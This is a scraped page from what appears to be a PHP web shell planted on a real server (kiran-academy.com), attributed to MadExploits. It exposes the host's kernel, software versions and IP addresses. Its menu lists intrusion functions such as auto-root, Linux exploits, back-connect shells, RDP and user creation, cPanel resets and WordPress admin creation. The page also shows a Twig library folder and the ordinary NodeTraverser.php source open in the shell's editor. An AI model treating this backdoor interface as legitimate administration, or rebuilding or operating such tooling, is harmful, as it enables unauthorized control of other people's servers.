Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
twig /
lib /
Twig /
[ HOME SHELL ]
Name
Size
Permission
Action
Cache
[ DIR ]
drwxr-xr-x
Error
[ DIR ]
drwxr-xr-x
Extension
[ DIR ]
drwxr-xr-x
Loader
[ DIR ]
drwxr-xr-x
Node
[ DIR ]
drwxr-xr-x
NodeVisitor
[ DIR ]
drwxr-xr-x
Profiler
[ DIR ]
drwxr-xr-x
Sandbox
[ DIR ]
drwxr-xr-x
Test
[ DIR ]
drwxr-xr-x
TokenParser
[ DIR ]
drwxr-xr-x
Util
[ DIR ]
drwxr-xr-x
BaseNodeVisitor.php
1.12
KB
-rw-r--r--
CacheInterface.php
1.35
KB
-rw-r--r--
Compiler.php
5.42
KB
-rw-r--r--
ContainerRuntimeLoader.php
867
B
-rw-r--r--
Environment.php
26.4
KB
-rw-r--r--
Error.php
8
KB
-rw-r--r--
ExistsLoaderInterface.php
327
B
-rw-r--r--
ExpressionParser.php
27.71
KB
-rw-r--r--
Extension.php
701
B
-rw-r--r--
ExtensionInterface.php
1.33
KB
-rw-r--r--
ExtensionSet.php
12.53
KB
-rw-r--r--
FactoryRuntimeLoader.php
797
B
-rw-r--r--
FileExtensionEscapingStrategy....
1.39
KB
-rw-r--r--
Filter.php
2.99
KB
-rw-r--r--
Function.php
2.77
KB
-rw-r--r--
Lexer.php
15.16
KB
-rw-r--r--
LoaderInterface.php
1.61
KB
-rw-r--r--
Markup.php
795
B
-rw-r--r--
Node.php
4.6
KB
-rw-r--r--
NodeCaptureInterface.php
367
B
-rw-r--r--
NodeOutputInterface.php
346
B
-rw-r--r--
NodeTraverser.php
1.9
KB
-rw-r--r--
NodeVisitorInterface.php
1017
B
-rw-r--r--
Parser.php
10.22
KB
-rw-r--r--
RuntimeLoaderInterface.php
701
B
-rw-r--r--
SimpleFilter.php
307
B
-rw-r--r--
SimpleFunction.php
311
B
-rw-r--r--
SimpleTest.php
303
B
-rw-r--r--
Source.php
966
B
-rw-r--r--
SourceContextLoaderInterface.p...
334
B
-rw-r--r--
Template.php
12.05
KB
-rw-r--r--
TemplateWrapper.php
3
KB
-rw-r--r--
Test.php
1.87
KB
-rw-r--r--
Token.php
5.59
KB
-rw-r--r--
TokenParser.php
606
B
-rw-r--r--
TokenParserInterface.php
818
B
-rw-r--r--
TokenStream.php
3.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NodeTraverser.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ /** * Twig_NodeTraverser is a node traverser. * * It visits all nodes and their children and calls the given visitor for each. * * @author Fabien Potencier <fabien@symfony.com> */ final class Twig_NodeTraverser { private $env; private $visitors = array(); /** * @param Twig_Environment $env * @param Twig_NodeVisitorInterface[] $visitors */ public function __construct(Twig_Environment $env, array $visitors = array()) { $this->env = $env; foreach ($visitors as $visitor) { $this->addVisitor($visitor); } } public function addVisitor(Twig_NodeVisitorInterface $visitor) { if (!isset($this->visitors[$visitor->getPriority()])) { $this->visitors[$visitor->getPriority()] = array(); } $this->visitors[$visitor->getPriority()][] = $visitor; } /** * Traverses a node and calls the registered visitors. * * @return Twig_Node */ public function traverse(Twig_Node $node) { ksort($this->visitors); foreach ($this->visitors as $visitors) { foreach ($visitors as $visitor) { $node = $this->traverseForVisitor($visitor, $node); } } return $node; } private function traverseForVisitor(Twig_NodeVisitorInterface $visitor, Twig_Node $node) { $node = $visitor->enterNode($node, $this->env); foreach ($node as $k => $n) { if (false !== $n = $this->traverseForVisitor($visitor, $n)) { $node->setNode($k, $n); } else { $node->removeNode($k); } } return $visitor->leaveNode($node, $this->env); } }
Close